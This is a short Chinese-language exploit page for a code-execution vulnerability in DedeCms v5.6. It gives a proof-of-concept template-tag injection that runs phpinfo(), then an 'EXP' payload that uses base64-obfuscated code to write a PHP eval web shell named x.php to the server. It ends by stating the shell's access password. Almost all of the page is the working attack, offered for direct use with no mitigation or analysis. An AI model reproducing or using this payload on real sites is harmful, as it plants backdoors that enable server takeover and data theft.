DedeCms_v5.6_嵌入惡意代碼執行漏洞_zh-tw

# DedeCms v5.6 嵌入惡意代碼執行漏洞/zh-tw

==漏洞信息==

在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。

==POC==

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},

==EXP==

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
x.php
password:xiao
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容